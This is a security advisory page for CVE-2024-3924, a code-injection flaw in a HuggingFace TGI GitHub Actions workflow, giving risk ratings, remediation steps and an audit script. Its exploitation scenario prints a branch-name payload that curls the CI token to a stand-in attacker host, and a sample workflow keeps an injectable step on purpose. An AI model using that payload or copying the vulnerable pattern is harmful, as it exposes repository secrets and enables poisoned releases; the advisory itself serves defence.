CVE-2024-3924: text-generation-inference: workflow injection RCE

UNKNOWN CISA: TRACK*
Published May 30, 2024
CISO Take

A GitHub Actions workflow in HuggingFace TGI uses the PR branch name (`github.head_ref`) unsanitized in a shell command, letting any external contributor execute arbitrary code on the CI runner by naming their branch as a payload. If your team uses TGI or forks of it, verify you're running a version past the fix commit (88702d8) and audit your own workflows for similar `github.head_ref` misuse. The real risk is supply chain: a compromised runner can exfiltrate repo secrets, inject malicious artifacts, or backdoor releases.

What is the risk?

Risk is HIGH for maintainers and contributors of TGI and any downstream forks. Exploitation requires only the ability to open a pull request — no repository write access needed. The affected workflow runs on `pull_request_target` context (implied by the vulnerability pattern), granting the runner access to repository secrets. For end-users who only consume published TGI releases, risk is indirect but real if the CI pipeline was exploited to poison a release artifact before the patch.

How severe is it?

CVSS 3.1
N/A
EPSS
0.3%
chance of exploitation in 30 days
Higher than 23% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What should I do?

5 steps
  1. Patch

    Ensure TGI >= post-commit 88702d8 (v2.0.0 fix). Verify using `git log --oneline | grep 88702d8` in your fork.

  2. Audit workflows

    Grep all `.github/workflows/*.yml` files for unquoted `${{ github.head_ref }}`, `${{ github.event.pull_request.head.ref }}`, or similar user-controlled inputs used in `run:` steps.

  3. Replace with safe alternatives

    Use `${{ github.base_ref }}` where applicable, or sanitize via `env:` variable assignment before shell use.

  4. Restrict pull_request_target

    Limit secrets access for workflows triggered by external PRs. Use `pull_request` (no secret access) instead of `pull_request_target` unless required.

  5. Verify release integrity

    Check SHA/digest of TGI images/packages against official Hugging Face releases to detect any potential tampering during the vulnerability window (before May 2024 fix).
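As an added example (not code from this page or from the TGI project), the following Python performs the audit of steps 2 and 3: it scans workflow text for `${{ }}` expressions that splice attacker-controlled contexts into `run:` steps, while leaving expressions assigned under `env:` alone. The embedded workflow is constructed, with one injectable step and its `env:` rewrite beside it; the context list extends the two names the page gives with the PR title and body, which GitHub's Actions hardening guide also lists as injection sources.

```python
import re

# Contexts an external PR author controls: the two this page names plus two more
# documented injection sources (PR title and body) from GitHub's Actions hardening guide.
UNSAFE_CONTEXTS = ("github.head_ref", "github.event.pull_request.head.ref",
                   "github.event.pull_request.title", "github.event.pull_request.body")
EXPR_RE = re.compile(r"\$\{\{\s*([^}]*?)\s*\}\}")          # ${{ ... }} expressions
RUN_RE = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")         # start of a run: step

def _scan(text, line_no):
    return [(line_no, ctx) for expr in EXPR_RE.findall(text)
            for ctx in UNSAFE_CONTEXTS if ctx in expr]

def find_unsafe_run_interpolations(workflow_text):
    """Return (line_no, context) for each unsafe expression spliced into a run: step."""
    # Expressions placed under env: are not reported: the shell then expands a quoted
    # variable instead of receiving attacker-controlled text as part of the command.
    findings, run_indent = [], None      # run_indent is set while inside a run: block scalar
    for line_no, line in enumerate(workflow_text.splitlines(), 1):
        m = RUN_RE.match(line)
        if m:
            findings += _scan(m.group(2), line_no)
            run_indent = len(m.group(1)) if m.group(2).lstrip()[:1] in ("|", ">") else None
            continue
        if run_indent is not None:
            indent = len(line) - len(line.lstrip())
            if line.strip() and indent <= run_indent:
                run_indent = None            # block scalar ended, back to ordinary keys
            else:
                findings += _scan(line, line_no)
    return findings

# Constructed sample (not the real TGI autodocs.yml): the first step splices the branch
# name straight into the shell; the second passes it through env: and quotes it.
SAMPLE_WORKFLOW = """\
on: pull_request_target
jobs:
  docs:
    runs-on: ubuntu-latest
    steps:
      - name: vulnerable (branch name becomes shell text)
        run: |
          pip install git+https://github.com/org/repo@${{ github.head_ref }}
      - name: hardened (expression goes into env, shell expands a quoted variable)
        env:
          HEAD_REF: ${{ github.head_ref }}
        run: |
          pip install "git+https://github.com/org/repo@${HEAD_REF}"
"""
```

The scanner is line-based rather than a YAML parser, so it needs no PyYAML and recognizes `run:` block scalars (`|` or `>`) by indentation; running it on `SAMPLE_WORKFLOW` reports only the vulnerable step's `pip install` line.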

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system supply chain
NIST AI RMF
GOVERN 6.1 - AI risk in the supply chain
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

Is CVE-2024-3924 actively exploited?

No confirmed active exploitation of CVE-2024-3924 has been reported, but organizations should still patch proactively.

How to fix CVE-2024-3924?

1. **Patch**: Ensure TGI >= post-commit 88702d8 (v2.0.0 fix). Verify using `git log --oneline | grep 88702d8` in your fork.
2. **Audit workflows**: Grep all `.github/workflows/*.yml` files for unquoted `${{ github.head_ref }}`, `${{ github.event.pull_request.head.ref }}`, or similar user-controlled inputs used in `run:` steps.
3. **Replace with safe alternatives**: Use `${{ github.base_ref }}` where applicable, or sanitize via `env:` variable assignment before shell use.
4. **Restrict pull_request_target**: Limit secrets access for workflows triggered by external PRs. Use `pull_request` (no secret access) instead of `pull_request_target` unless required.
5. **Verify release integrity**: Check SHA/digest of TGI images/packages against official Hugging Face releases to detect any potential tampering during the vulnerability window (before May 2024 fix).

What systems are affected by CVE-2024-3924?

This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, CI/CD pipelines for AI frameworks, Model serving infrastructure, Self-hosted HuggingFace TGI deployments.

What is the CVSS score for CVE-2024-3924?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

LLM inference serving
CI/CD pipelines for AI frameworks
Model serving infrastructure
Self-hosted HuggingFace TGI deployments

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0050 Command and Scripting Interpreter
AML.T0055 Unsecured Credentials
AML.T0079 Stage Capabilities

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2
NIST AI RMF: GOVERN 6.1
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

A code injection vulnerability exists in the huggingface/text-generation-inference repository, specifically within the `autodocs.yml` workflow file. The vulnerability arises from the insecure handling of the `github.head_ref` user input, which is used to dynamically construct a command for installing a software package. An attacker can exploit this by forking the repository, creating a branch with a malicious payload as the name, and then opening a pull request to the base repository. Successful exploitation could lead to arbitrary code execution within the context of the GitHub Actions runner. This issue affects versions up to and including v2.0.0 and was fixed in version 2.0.0.

Exploitation Scenario

An adversary targeting an organization's LLM inference infrastructure forks `huggingface/text-generation-inference`. They create a branch named `$(curl -s https://attacker.com/exfil?token=$GITHUB_TOKEN)` or a more complex payload embedding reverse shell code. They open a pull request from this branch to the upstream repo. GitHub Actions triggers the `autodocs.yml` workflow on the PR, which constructs a `pip install` or similar command interpolating the raw branch name — executing the attacker's payload in the runner context. The runner, having access to repository secrets (PyPI tokens, signing keys, HuggingFace Hub credentials), exfiltrates them. The attacker then uses stolen credentials to publish a trojanized TGI release to PyPI or the Docker Hub, which propagates to every organization that auto-updates their LLM serving infrastructure.

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

Timeline

Published
May 30, 2024
Last Modified
November 21, 2024
First Seen
May 30, 2024
